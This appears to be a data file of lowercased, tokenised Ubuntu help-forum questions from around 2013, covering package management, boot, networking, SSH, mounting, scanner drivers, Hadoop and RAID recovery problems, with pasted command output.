263705	is there a way to pull source for a package for a specific release ?	is there a way to pull source for a package ( apt-get source ) but specify the release ? for example , i 'd love to be able to just run apt-get source -- raring python-imaging . i know i can manually pull from packages.ubuntu.com , is there a tool that can do this for me ?
263723	multitouch gestures in gnome-shell	i switched from unity to gnome , and i really miss the gestures on unity ( 3 fingers window moving , expand to maximize , etc ) . i have two finger scrolling and two finger tap to right click out of the box on gnome , but is there any way to configure these additional gestures ? thanks ! ubuntu 12.10 64 bit , asus n56vz
263730	nexus 10 running ubuntu touch wo n't turn on after entering recovery	i installed ubuntu touch on my nexus 10 a couple days ago but when when trying to enter stock recovery , to manually flash android , it turned off and wont turn on . i have tried every basic fix that involves the physical keys . any other possibilities i could try ? maybe command prompt ? i am able to see a charging symbol for a couple seconds while plugged into charger .
263734	fan constantly running even after updates ( maybe harddrive ? )	i have recently installed ubuntu and i have also installed bumblebee which caused the fan to run constantly due to hybrid graphics card . i also also installed jupiter to switch my laptop into power savings mode . even after all that my fan is still constantly running , i believe its due to the harddrive , but i may be wrong since im not an expert . i can not find any options to configure harddrive in power management . also i feel as if my intel graphic card is n't updated because videos do n't feel hd when i play them . thanks .
263736	problem when generating grub.cfg	when i ran update-grub in terminal it gave me this message : root @ thinkpad-w520 : /dev # sudo update-grub generating grub.cfg ... found linux image : /boot/vmlinuz-3.5.0-25-generic found initrd image : /boot/initrd.img-3.5.0-25-generic found linux image : /boot/vmlinuz-3.5.0-23-generic found initrd image : /boot/initrd.img-3.5.0-23-generic found memtest86+ image : /boot/memtest86+.bin grep : /proc/mounts : no such file or directory grep : /proc/swaps : no such file or directory found ubuntu 12.04.2 lts ( 12.04 ) on /dev/sda1 found windows 8 ( loader ) on /dev/sda3 done do you know why is this happening ? i am referring to these two lines which begin with grep i have never seen these again . here is also the output that fdisk -l gave : device boot start end blocks id system /dev/sda1 2048 671326207 335662080 83 linux /dev/sda2 671328254 703326207 15998977 5 extended /dev/sda3 * 703326208 704043007 358400 7 hpfs/ntfs/exfat /dev/sda4 704043008 937699327 116828160 7 hpfs/ntfs/exfat /dev/sda5 671328256 703326207 15998976 82 linux swap / solaris
263739	help me to customize gtk3 theme	i 'm trying to make a flat theme , which will look identical for gtk2 and gtk3 apps . for now , i 'm trying to get rid of outlines on toolbars and menubars in gtk3 . this is code from gtkrc-2.0 , which remove outlines : gtkmenubar : :internal-padding = 0 gtkmenubar : :shadow-type = gtk_shadow_none gtktoolbar : :internal-padding = 0 gtktoolbar : :shadow-type = gtk_shadow_none i need code which does the same for gtk-widgets.css . sorry for my bad english .
263740	bad downloaded packages ? linux-image-3.2.0-32-generic-pae ' is missing final newline	i 'm having some trouble updating my software . it seems like the new packages have been downloaded but one package is giving me some trouble this is the output i get when i try to upgrade my software packages : sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : e : unmet dependencies . try using -f. sudo apt-get upgrade -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages have been kept back : linux-generic-pae linux-headers-generic-pae linux-image-generic-pae the following packages will be upgraded : activity-log-manager-common activity-log-manager-control-center apport apport-gtk apt-transport-https apt-utils bind9-host brasero brasero-cdrkit brasero-common busybox-static checkbox checkbox-qt compiz compiz-core compiz-gnome compiz-plugins-default cups-pk-helper deja-dup dhcp3-server dkms dnsutils duplicity ffmpeg firefox firefox-globalmenu firefox-gnome-support firefox-locale-en flashplugin-installer fonts-opensymbol gdb gimp gimp-data gir1.2-networkmanager-1.0 gir1.2-telepathyglib-0.12 gnome-accessibility-themes gnome-control-center gnome-control-center-data gnome-games-data gnome-settings-daemon gnome-sudoku gnome-themes-standard gnomine grub-common grub-pc grub-pc-bin grub2-common gstreamer0.10-pulseaudio gwibber gwibber-service gwibber-service-facebook gwibber-service-identica gwibber-service-twitter icedtea-6-jre-cacao icedtea-6-jre-jamvm icedtea-7-jre-cacao icedtea-7-jre-jamvm indicator-messages indicator-status-provider-mc5 jockey-common jockey-gtk jupiter libbind9-80 libbrasero-media3-1 libdecoration0 libdns81 libfreerdp-plugins-standard libfreerdp1 libgimp2.0 libglu1-mesa libgnome-control-center1 libgwibber-gtk2 libgwibber2 libindicator-messages-status-provider1 libisc83 libisccc80 libisccfg82 liblightdm-gobject-1-0 liblwres80 libnautilus-extension1a libnm-glib-vpn1 liboverlay-scrollbar-0.2-0 liboverlay-scrollbar3-0.2-0 libpq5 libpurple-bin libpurple0 libreoffice-emailmerge libreoffice-help-en-us libreoffice-style-human libreoffice-style-tango libtelepathy-glib0 libunity-core-5.0-5 libupnp3 libvlc5 libvlccore5 light-themes linux-libc-dev mahjongg make man-db mtp-tools nautilus nautilus-data openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib openjdk-7-jre openjdk-7-jre-headless openjdk-7-jre-lib openssl overlay-scrollbar plymouth-theme-ubuntu-logo plymouth-theme-ubuntu-text pulseaudio pulseaudio-module-bluetooth pulseaudio-module-gconf pulseaudio-module-x11 pulseaudio-utils python-apport python-keyring python-libproxy python-libxml2 python-problem-report python-ubuntu-sso-client seahorse skype skype-bin software-center synaptic thunderbird thunderbird-globalmenu thunderbird-gnome-support thunderbird-locale-en thunderbird-locale-en-us transmission-common transmission-gtk ubuntu-desktop ubuntu-minimal ubuntu-sso-client ubuntu-sso-client-gtk ubuntu-standard unattended-upgrades unity unity-common unity-greeter unity-lens-applications unity-services vino vlc vlc-data vlc-nox vlc-plugin-notify vlc-plugin-pulse xorg xserver-xorg xserver-xorg-input-all xserver-xorg-video-all xserver-xorg-video-intel xserver-xorg-video-qxl xul-ext-ubufox 160 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . 1 not fully installed or removed . need to get 0 b/229 mb of archives . after this operation , 12.1 mb of additional disk space will be used . do you want to continue [ y/n ] ? y extracting templates from packages : 100 % preconfiguring packages ... ( reading database ... 90 % dpkg : unrecoverable fatal error , aborting : files list file for package 'linux-image-3.2.0-32-generic-pae ' is missing final newline e : sub-process /usr/bin/dpkg returned an error the problem first showed up trying to upgrade through ubuntu update manager which recommends trying the -f option from the command line . do i need to somehow purge my downloaded but uninstalled packages ? seems like the linux image file may be bad .
263745	add context menues to nautilus for comparing directories with meld	i 'm pretty used to winmerg when working on windows , and it has a really nice feature . it adds an option to the explorer context menu that says 'compare to ... ' the first time you use it , and then it says 'compare ' and 'change first folder ' . when you click on compare , it launches winmerge with both folder compared . is there some way to achieve the same in nautilus for meld ? right now i 'm running it form the command-line passing both directories as parameters
263748	how to remove firefox & temp file for firefox in ubuntu ?	how to remove old version firefox and how remove temp file for firefox in ubuntu ? how to remove old version firefox and install new firefox 19.0 in ubuntu ?
263750	how to mount a windows 8 partition	i am not able to mount my windows 8 partition . trying to do so leads to the message : error mounting /dev/sdb2 at /media/josh/windows 8 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb2 '' `` /media/josh/windows 8 '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sdb2 ' : operation not permitted the ntfs partition is hibernated . please resume and shutdown windows properly , or mount the volume read-only with the 'ro ' mount option , or mount the volume read-write with the 'remove_hiberfile ' mount option . for example type on the command line : mount -t ntfs-3g -o remove_hiberfile /dev/sdb2 /media/josh/windows 8 i know that the issue has been discussed several times on this platform ( the best thread would be this one : unable to mount windows ( ntfs ) filesystem due to hibernation ) . the problem in my case it that turning off the windows 8 fast startup option leads to simply nothing . i get this message if i shut down normally as well as if i restart windows 8 . therefore i am unable to use ( =read & write ) my partition without deleting the hiberfile everytime .
263754	compiling meshlab	i am trying to install meshlab as per the documentation . i installed all the dependencies and followed the steps . but am having trouble with certain steps here . in order to successfully compile a meshlab 's plugin with external dependency you have before to compile the referred library and put it into the folder ~/devel/meshlab/src/external/lib/your_development_environment where your_development_environment is a string related to your operating system and compiler 's version . i am using ubuntu 11.10 and gcc , qmake . i do not know what is the exact value of the string i have to give for your_development_environment . i tried to go through qmake guide and qmakespec definitions . it said it would actually lead to a path . as per this link , for ubuntu 10.04 , he has given the value as linux-gcc . can you please tell me what value i should give ? i tried to compile the meshlab_mini.pro , which does n't not need the external libraries , but got this error . /usr/bin/ld : can not find -ljhead i do not know how to proceed after this . please help me here . from-source-on-ubuntu-lucid-10.04.html
263756	unable to connect to my remote ubuntu system using ssh	i want to connect to my remote pc running on ubuntu 12.10 using ssh . but when i try ssh my_username @ my_current_ip , i get this error : ssh : connect to host 117 ... ** port 22 : connection timed out i have installed open-ssh server and manually forwarded the requests at port 22 to the port 22 corresponding to my local ip . still i can not connect to the system . i tried nmapping to the system remotely and found port 22 to be closed , but when nmap is run for localhost on the local system , the port is said to be open . how can i solve this ? additional information : router : dsl 2520u os : ubuntu 12.10 32 bit
263759	how to download youtube videos via https	i am unable to access youtube on http . but i can access the same on an https . when i executed the command wget https : //www.youtube.com/watch ? v=stjlvbpivtw it returned the following response : -- 2013-03-04 13:09:28 -- https : //www.youtube.com/watch ? v=stjlvbpivtw resolving www.youtube.com ( www.youtube.com ) ... 74.125.236.167 , 74.125.236.160 , 74.125.236.164 , ... connecting to www.youtube.com ( www.youtube.com ) |74.125.236.167|:443 ... connected . unable to establish ssl connection . please guide me on how to download the youtube videos on https .
263761	installation and configuration of an snmp client	i want to install a snmp client ( not agent ) on my computer so i can connect to a cisco router on which an snmp agent is already installed . the problem that all the documentation i found for ubuntu were for installing an agent not a client .
263771	cloning a remote virtual server	i rented a virtual server running ubuntu . to test changes to my configuration i 'd like to be able to try them on a local machine . so basically i 'd like to create a clone of the virtual server ( i do n't care if this clone will then run as a physical server or virtualized on a local machine ) and either keep track of any changes to get some kind of script or playbook to recreate these on the remote system or publish these changes automatically . on the remote system i 've got ssh , while the target system is mine with physical access so there should n't be any limitations locally . as there is a bandwith limitation i 'd like to reduce the files copied as much as possible . what it boils down to : which files or directories are needed to replicate the remote machine ? what 's the best way to transfer the data ? ( tar'ing everyting up and scp'ing it ? ) is there a way to create the script or playbook ?
263776	where to download the cycles render engine ?	i 've installed blender from software center , but it does n't contain the cycles render engine by default . is it a different package or do i need to download blender from a ppa ?
263777	virtualbox - failed to open a session for the virtual machine	i installed virtualbox via software center . when i try to load a vm , getting an error exactly like this : after i googled this error , found many different solutions , none of them were helped my situation . also i removed all packages associated with virtualbox , then downloaded and installed the latest package which i downloaded from oracle repositories . nothing is changed . additional information : os : ubuntu 12.04 64-bit vm : linux mint 14 cinnamon/mate 64-bit i created new vdi disk and tried to start it from .iso image . virtualbox settings : num of processors : 4 memory : 512 mb video memory : 128 mb 3d acceleration : enabled
263782	folder permissions changed automatically	hey guys first of all i searched a lot on this site but didnt get any exact answer to my questions . dont know something happened automatically and all the folders permissions changed automatically and there came a lock icon on all of my folders and files . then i searched on this site and got the solution as this command sudo chown 777 -r $ user : $ user $ home it solved my problem half way , it removed the lock icon but now all folders permissions are read only so please guide me how to reset all the folder permissions as it was previously ? i 'm using ubuntu 12.10 thanks
263783	ssh : connect to host xxxx @ xxxx.in in port 22 : connection timed out	i am new to linux and ssh . when i try to connect to a remote grid computer ( for which i have access ) i am getting connection timed out error . i have recently installed ubuntu in my system . i also have openssh client and server . port 22 is enabled and i can access localhost . kindly give me a step by step procedure to solve the problem , as i am new to this whole thing . regards
263787	bridge connection : ubuntu keeps modifying routing table	i have set up a bridge connection from my mobile phone connected via usb to my laptop running ubuntu 12.04 to another computer connected via ethernet cable . the bridge thus connects usb0 and eth0 . i set it up by typing following commands on my laptop : $ ifconfig usb0 0.0.0.0 promisc up $ brctl addbr br0 $ brctl addif br0 usb0 eth0 $ ifconfig br0 up now the other computer ( connected to my laptop via ethernet ) can connect to the internet . i now use following commands to restore the internet connection on my laptop : $ ifconfig br0 192.168.42.200 up $ route del default $ route add default gw 192.168.42.129 br0 after this operation , route prints the following kernel ip routing table : kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.42.129 0.0.0.0 ug 0 0 0 br0 link-local * 255.255.0.0 u 1000 0 0 usb0 192.168.42.0 * 255.255.255.0 u 0 0 0 br0 192.168.42.0 * 255.255.255.0 u 1 0 0 usb0 everything works fine , both computers can connect to the internet , but then suddenly my laptop looses the connection . i found that this happens because the kernel ip routing table was modified . route now gives following output : kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.42.129 0.0.0.0 ug 0 0 0 usb0 link-local * 255.255.0.0 u 1000 0 0 usb0 192.168.42.0 * 255.255.255.0 u 1 0 0 usb0 apparently ubuntu does not like to be connected via br0 and thus switches back to usb0 . the connection can be restored though , by again resetting the route table : $ route del default $ route add default gw 192.168.42.129 br0 unfortunately , after a few moments the connection is lost again . once it would even last for 5 minutes before ubuntu decided to kill it again . how can i prevent ubuntu from modifying the kernel ip routing table ?
263788	unmount fuse mountpoints on logout ?	i have a couple of folders containing compressed data . i have one application which needs to access the uncompressed version of the same data . a simple way to solve that for me has been to run a script upon login looking something like this : # ! /bin/bash rar2fs -o allow_other /home/user/source1 /home/user/target1 rar2fs -o allow_other /home/user/source2 /home/user/target2 rar2fs -o allow_other /home/user/source3 /home/user/target3 rar2fs -o allow_other /home/user/source4 /home/user/target4 to get the script to run when i login was simple , i just added it using 'startup applications ' . i just now realized however that my approach comes up short when i log out then back in again . my guess is it works badly since the rar2fs/fuse mounts happen within my encrypted home folder . when i log out i think ubuntu locks the encryption , but my mount probably stick around even though both source and target are inaccessible . then when i login again , adding insult to injury , i try to do the mount again . leaving me with mountpoints that spit out errors like when i try to access them : error : error when getting information for file '/home/user/target1 ' : transport endpoint is not connected my guess is this could be prevented if i could just get the system to unmount properly on logout , but i do n't know how to get a script to run upon logout . how does one properly shut down a fuse mount before logout ? edit : i 'm using unity . edit : running fusermount -u using session-cleanup-script i get the following error : fusermount : bad mount point /home/user/target1 : no such file or directory i 've also tried adding the umount loop to my mount script so that it should umount the folders before mounting them if they are already mounted , but those umounts fail as well : fusermount : failed to unmount /home/user/target1 : invalid argument my guess is that the first solution fails because the encrypted home locks before the cleanup-script is run . perhaps there is some way to hook into the encryption routine and have a script run before the home folder locks ? if i run the umount-script manually before logging out the mountpoints work as expected when i login again .
263789	set up mailserver for multiple domains guide for beginner	i am not linux pro , and after days of trying with tutorials how to set up postfix or other e-mail server i am try to find solution here . in your office we have hp proliant server with ubuntu server 12.10 . i installed configured , the mysql , apache2 , php5 , vnc , ssh , to provide webhosting for our clients ( we do not provide dns service ) . i tested it on multiple domains and subdomains everything is fine . now i want to set up email server for our domain and for any other domain pointing to our ip adress . so if we create website for you client , we provide him and domain example.com with webhosting and also we want to provide him a email addresses like something @ example.com . i red some tutorials with postfix + mysql for vitual users but lot of config files are in other location or main file is including others . so i cant find lot of things in included files and main file that tutorials is described . ( they seems to be outdated ) can somebody provide me step by step instructions or ebook how to set up mailserver ? from apt-get install to fetch messages with email client . in short : not virtualized we do not provide dns service ( we are using a record on domains ) test domain is from http : //dot.tk ( soft-tech-srv.tk ) using dot.tk free dns service system is ubuntu server 12.10 amd64 , with xfcedesktop and ssh + vnc access mysql , apache2 , php5 , ftp installed and configured full email service is needed . thanks .
263793	geany / gedit : hex editor plugin	are there any plugins for geany / gedit to support reading binary/hex files ?
263796	i need help running a script constantly for a vpn connection . how to go around the ping	i am one of those who need to use vpnc for a connection with a net . i 've tried so many tutorials ' example like this , this and this without success . i know decided to write a small script to reconnect after reconnection . my shell scripting is so bad that i do n't know how to log what happens on the box . aside that , i just realized that pinging is disable on the machine i need to connect to . how can i go around it ? here is my script which is added to crontab to run every 5 minutes # ! /bin/bash host= '' 192.168.0.18 '' pinging ( ) { ping -c6 $ host return $ ? } pinging result= $ ? case $ result in 0 ) # ping ok everything is fine ; ; 1 ) # no reply , meaning the host down then reconnect /usr/sbin/vpnc configname ; ; 2 ) # # misc . ping errors , # do n't know what to do here . how do i log this ? ; ; esac so to recap , i need : be able to go around pinging . other alternatives ? be able to log what happens at every run or so can anyone help me achieve that ?
263800	lock screen turn off and on : goes to a loop asking to enter password to unlock- then turns off again .	i recently updated my laptop from 12.04 to 12.10 . and now , whenever i lock screen with `` ctrl+alt+l '' , the screen locks , and monitor turns off . but within 30 seconds , it turns on and asks for password . after some time , it says 'time expired ' and turns off . this keeps happening until my battery goes dead . : -1 please assist me with this . also , i 'm using dell inspiron 15r ( 5520 ) ( no external graphics card ) . often the fan speed goes very high for sometime . if you have any solution , please help me . thanks .
263807	brother mfc7420 and ubuntu 12.10	this problem was supposedly solved a year ago but for me it is n't . sorry to pick this up so much later but i tried the supposed solution and no matter what i do it will not scan . printer works fine , no issues there . but there is some sort of weird udev , usb type fail going on with the scanner device . i followed brother 's installation instructions to the letter , also the person who noticed that the lib64 libraries do n't get created . this is 12.10 linux gamera 3.5.0-25-generic # 38-ubuntu smp mon feb 18 23:27:42 utc 2013 x86_64 x86_64 x86_64 gnu/linux here is lsusb output : lsusb bus 004 device 002 : id 083d:0005 bus 004 device 004 : id 04f9:0180 brother industries , ltd mfc-7420 bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 009 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 010 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 011 device 001 : id 1d6b:0003 linux foundation 3.0 root hub scanner is found on bus 4 dev 4 . when i try to scan to image , gimp starts ok but the file type is wrong and in any case the step of actually scanning something gets missed . here is typical dmesg output : [ 7360.577640 ] usb 4-2 : usbfs : process 6241 ( simple-scan ) did not claim interface 0 before use [ 7360.669419 ] usblp0 : removed [ 7360.682605 ] usblp 4-2:1.0 : usblp0 : usb bidirectional printer dev 4 if 0 alt 0 proto 2 vid 0x04f9 pid 0x0180 [ 7362.004608 ] usb 4-2 : usbfs : usbdevfs_control failed cmd brscan-skey-0.2 rqt 128 rq 8 len 64 ret -75 [ 7362.004629 ] usb 4-2 : usbfs : interface 0 claimed by usblp while 'brscan-skey-0.2 ' sets config # 1 [ 7367.024028 ] usb 4-2 : usbfs : process 6241 ( simple-scan ) did not claim interface 0 before use i uncommented the echo line in /opt/brother/scanner/brscan-skey/script/scantoimage-0.2.4-0.sh and it says : /opt/brother/scanner/brscan-skey/script # scan from usb ( brother2 : bus8 ; dev1 ) to /home/cmeo/brscan/brscan.sxvdcq this is just mad , has no relationship to bus 4 dev 4 , and there is an additional problem in that gimp requires a file type -- but which one to use ? how do i debug this ? can it be got to work on ubuntu 12.10 ? 1 : libraries 64bit libs install does n't create required files in /usr/lib/sane . easy to fix . found using sane_debug_dll=128 . 2 : this one had me gobsmacked i was feeling lucky so i set sane_debug_sanei_usb= '' 128 '' /usr/lib/sane # scanimage -l [ sanei_debug ] setting debug level of dll to 0 . [ sanei_debug ] setting debug level of sanei_usb to 128 . [ sanei_usb ] sanei_usb_init : marking existing devices [ sanei_usb ] sanei_usb_init : looking for kernel scanner devices [ sanei_usb ] sanei_usb_init : ca n't stat /dev/usb/ : no such file or directory [ sanei_usb ] sanei_usb_init : sane is built without support for libusb [ sanei_usb ] sanei_usb_init : found 0 devices [ sanei_usb ] sanei_usb_find_devices : vendor=0x04b0 , product=0x4002 device `brother2 : bus8 ; dev1 ' is a brother mfc-7420 usb scanner sane built without libusb support ? say what ? ? so now there 's another and much better question : what 's the best way to get sane with libusb support ? 3 . windows user experience anyone ? i tried downloading the sane source and building it ... darn thing would n't run due to an undefined symbol . not supposed to happen ... ran make uninstall because i neglected to uninstall all the sane packages first , the sane installation was now utterly mangled . bit of a d'oh moment -- but wait ! uninstalled all the broken packages . reinstalled using synaptic . magic -- scanner is now working . this raises more questions than it answers , but i 'm not going to complain . it works now , and for no good reason since nothing has theoretically changed . so -- just like windows ! so what 's the takeaway ? copy /usr/lib64/sane stuff created by brother driver package to /usr/lib/sane , or use symlinks or whatever . does n't seem to matter . in all other respects they seem to be good drivers and this vendor unlike many others is at least taking it seriously . do n't forget to run /usr/local/brother/sane/setupsanescan2 -i rmmod usblp so it wo n't preempt the scanner . todo : blacklist it for ever . run brscan-skey -l to see if it 's there run brscan-skey if you ca n't get any sense out of it at this point , remove all sane packages and re-install them . rinse and repeat 1-5 . should n't work but did for me . scan away
263808	high cpu load on libreoffice menu	my ubuntu 12.04 lts with gnome-classic shows a large cpu usage after i highlight any libreoffice app in gnome menu ( apps- > office- > * ) .. only on libreoffice . what is the reason ?
263810	chrome maximised black screen , missing icons and text	so i 'm running ubuntu 12.10 , and i 've been having issues with the google chrome icons going blank until i hover over them . the text on each tab also goes blank often . i presume it 's some graphic card incompatibility . it has n't really bothered me till now . i 've installed kde over ubuntu ( because unity ) and it seems to have slowly gotten worse . if i maximise a chrome window or increase it 's size beyond a certain amount , the window is basically failing to update . new tabs are just black screen . if i load a web page i have to scroll around to force it to update , and sometimes it wo n't even do that . i should note it is n't just chrome is effected , eclipse is having issues with blank icons too , but i 'm not getting the horrible black screen with that , so i can still work . i 've tried disabling desktop effects ( shift+alt+f12 ) but it does n't help . im using an asus n55sl which has an nvidia geforce gt 635m 2gb graphics card . so in summary , this seems to be desktop environment ( kde and ubuntu ) and application ( chrome and eclipse ) independent . happy to provide output of terminal commands at request . edit : a little more information , i just had to shut my computer down because the keyboard and mouse stopped responding . on restart everything seems fine , but as i remember , the situation slowly gets worse over time . i will update this as and when things start breaking ...
263816	getting packages into ubuntu during debian freeze	i am the developer of an application found in the ubuntu repos . a few months ago i released a new version which i packaged and submitted to debian . the package was accepted and uploaded to experimental because debian was and still is frozen for release . this package has not been picked up by 13.04 because ubuntu imports from unstable which still has the old version . how do i get my package into ubuntu 13.04 , given that debian is frozen ?
263817	apt-get install does not work	i want to install snmp on my computer . evey time i do apt-get install snmp snmpd mbrowse it displays this message : reading packages list ... fait building dependency tree reading state informations ... fait package snmp is not available but it is refered to bu another package . this may mean that the package is missing , has been obsoleted or is only available from another source however the following package replace it : libsnmp15 i do n't understand the problem . i mean apt-get is supposed to be a first step to configure snmp . if the downloading is such a mess , how the configuration would be ?
263819	ca n't connect second monitor with hp pavilion g6 over ubuntu 12.04	i am using hp pavilion g6 notebook computer with ubuntu 12.04 . i am unable to connect second monitor via hdmi or vga . i am trying this for few days now and fed up by now . i am using intel graphic drivers which comes as default with ubuntu 12.04 . can any one please help me ?
263823	error while starting hadoop	when i try to run hadoop as bin/start-all.sh , i get this error . : mkdir : can not create directory /home/prasanna/desktop/hadoop/libexec/../logs : permission denied chown : can not access /home/prasanna/desktop/hadoop/libexec/../logs : no such file or directory starting namenode , logging to /home/prasanna/desktop/hadoop/libexec/../logs/hadoop-prasanna-namenode-prasanna-virtualbox.out /home/prasanna/desktop/hadoop/bin/hadoop-daemon.sh : line 135 : /home/prasanna/desktop/hadoop/libexec/../logs/hadoop-prasanna-namenode-prasanna-virtualbox.out : no such file or directory head : can not open /home/prasanna/desktop/hadoop/libexec/../logs/hadoop-prasanna-namenode-prasanna-virtualbox.out for reading : no such file or directory what would be the reason and how should i fix this ? ps : i am very new to linux
263824	ubuntu touch on htc hd2 leo	is it possible to get a version of the great ubuntu touch for htc hd2 leo ? htc leo seems to be an unsupported device ?
263826	cmake 2.8.9 on ubuntu 10.04	i have installed cmake using apt-get and the `` latest '' version is 2.8.0 . but when i try to used , my project requires cmake version 2.8.9 . i try to update but without any success using apt-get . how can i get cmake 2.8.9 on ubuntu 10.04
263828	roaming profiles - central home directories	until now i have two ubuntu laptops at home . i use usually the one , my wife the other . kids start to get older and use whatever is available . it would be very handy , to have a centralized /home , for example an ssd attached to the router . how do i achieve the following : user a on laptop l1 is also the same user a on latptop l2 synchronize content : as soon as content is saved on laptop l1 by user a , it will get synced to l2 ( either when the l2 is on , or latest when a logs into l2 ; i know that conflict management might be an issue here ) if the central home service becomes unavailable , a transparent shadow copy will be available . as soon as /home/ becomes available again , syncing starts . what i do not care : i do not care if l1 uses e.g . libreoffice 4.0 and l2 libreoffice 3.6 or l1 has gimp installed while there is no gimp at all on l2 . btw . i do not know the proper wording for `` roaming profiles '' in the unix world , another term ?
263829	recover failed raid1 software partition / missing partition table or superblock	i already read & tried different approaches for 2 days now but nothing seems to work . i have 2 hdds , on each one is an partition with 200gb which i had in raid1 . then i installed xbmc and tried to start the raid again . the array starts , but it is missing the filesystem ( i think it was ext4 ) , so mounting is not possible . outputs : ubuntu @ ubuntu : ~ $ sudo fdisk -l platte /dev/sda : 1000.2 gbyte , 1000204886016 byte 255 köpfe , 63 sektoren/spur , 121601 zylinder einheiten = zylinder von 16065 × 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xf3b92028 gerät boot . anfang ende blöcke id system /dev/sda1 * 1 97379 782196786 83 linux /dev/sda2 97380 121601 194563215 fd linux raid autodetect platte /dev/sdb : 1500.3 gbyte , 1500301910016 byte 255 köpfe , 63 sektoren/spur , 182401 zylinder einheiten = zylinder von 16065 × 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0c41a682 gerät boot . anfang ende blöcke id system /dev/sdb1 * 1 9362 75194336 83 linux /dev/sdb2 9362 10199 6724609 5 erweiterte /dev/sdb3 10200 34421 194563215 fd linux raid autodetect /dev/sdb4 34515 182401 1187902327+ 83 linux /dev/sdb5 9362 10199 6724608 82 linux swap / solaris platte /dev/sde : 1977 mbyte , 1977614336 byte 64 köpfe , 63 sektoren/spur , 957 zylinder einheiten = zylinder von 4032 × 512 = 2064384 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 gerät boot . anfang ende blöcke id system /dev/sde1 1 957 1929244+ 6 fat16 sda2 and sdb3 have been in an raid1-array . ubuntu @ ubuntu : ~ $ sudo mdadm -e -s array /dev/md0 level=raid1 num-devices=1 uuid=5c001a6c:9e51fa30 : e368bf24 : bd0fce41 array /dev/md0 level=raid1 num-devices=2 uuid=ed6394c7:53941634 : e368bf24 : bd0fce41 the raid with 1 device is from when i tried to make an array with 1 disk to recover data ( which didnt work out ) . i havent deleted the array yet because i dont know what will happen . i hope i didnt made it worse by that . then i tried this guide : http : //linuxexpresso.wordpress.com/2010/03/31/repair-a-broken-ext4-superblock-in-ubuntu/ ubuntu @ ubuntu : ~ $ sudo fsck.ext4 -v /dev/sdb3 e2fsck 1.41.11 ( 14-mar-2010 ) fsck.ext4 : superblock ungültig versuche es mit backup-blöcken ... fsck.ext4 : bad magic number in super-block beim versuch , /dev/sdb3 zu öffnen superblock ist unlesbar bzw . beschreibt kein gültiges ext2 dateisystem . wenn gerät gültig ist und ein ext2 dateisystem ( kein swap oder ufs usw . ) enthält , dann ist der superblock beschädigt , und sie könnten e2fsck mit einem anderen superblock : e2fsck -b 8193 < gerät > ubuntu @ ubuntu : ~ $ sudo mke2fs -n /dev/sdb3 mke2fs 1.41.11 ( 14-mar-2010 ) dateisystem-label= os-typ : linux blockgröße=4096 ( log=2 ) fragmentgröße=4096 ( log=2 ) stride=0 blocks , stripe width=0 blocks 12165120 inodes , 48640803 blöcke 2432040 blöcke ( 5.00 % ) reserviert für den superuser erster datenblock=0 maximale dateisystem-blöcke=0 1485 blockgruppen 32768 blöcke pro gruppe , 32768 fragmente pro gruppe 8192 inodes pro gruppe superblock-sicherungskopien gespeichert in den blöcken : 32768 , 98304 , 163840 , 229376 , 294912 , 819200 , 884736 , 1605632 , 2654208 , 4096000 , 7962624 , 11239424 , 20480000 , 23887872 ubuntu @ ubuntu : ~ $ sudo e2fsck -b 11239424 /dev/sdb3 e2fsck 1.41.11 ( 14-mar-2010 ) e2fsck : das argument ist ungültig beim versuch , /dev/sdb3 zu öffnen superblock ist unlesbar bzw . beschreibt kein gültiges ext2 dateisystem . wenn gerät gültig ist und ein ext2 dateisystem ( kein swap oder ufs usw . ) enthält , dann ist der superblock beschädigt , und sie könnten e2fsck mit einem anderen superblock : e2fsck -b 8193 < gerät > ubuntu @ ubuntu : ~ $ sudo e2fsck -b 20480000 /dev/sdb3 e2fsck 1.41.11 ( 14-mar-2010 ) superblock has an ungültig journal ( inode 8 ) . bereinige < j > ? ja *** ext3 journal has been deleted - filesystem is now ext2 only *** die dateisystem größe ( laut superblock ) ist 48827559 blocks die physikalische größe von gerät ist 48640803 blocks entweder der superblock oder die partionstabelle ist beschädigt ! abbrechen < j > ? ja i really have no idea if it is the partition table or the superblocks . at first i think i should delete the array with the one device , how do i do that without breaking anything ( than it is now : d ) ? and after that - what should i do next ? thanks in advance guys ! edit : i just found this https : //bbs.archlinux.org/viewtopic.php ? id=136766 i think i also messed something up when creating the array . but when i do sudo e2fsck -cc /dev/md0 it gives me the following error again : ubuntu @ ubuntu : ~ $ sudo e2fsck -cc /dev/md0 e2fsck 1.41.11 ( 14-mar-2010 ) e2fsck : superblock ungültig versuche es mit backup-blöcken ... e2fsck : bad magic number in super-block beim versuch , /dev/md0 zu öffnen superblock ist unlesbar bzw . beschreibt kein gültiges ext2 dateisystem . wenn gerät gültig ist und ein ext2 dateisystem ( kein swap oder ufs usw . ) enthält , dann ist der superblock beschädigt , und sie könnten e2fsck mit einem anderen superblock : e2fsck -b 8193 < gerät > do i have to run resize2fs so the physical and the size of the fs do match again ? ( i didnt run this command yet ) 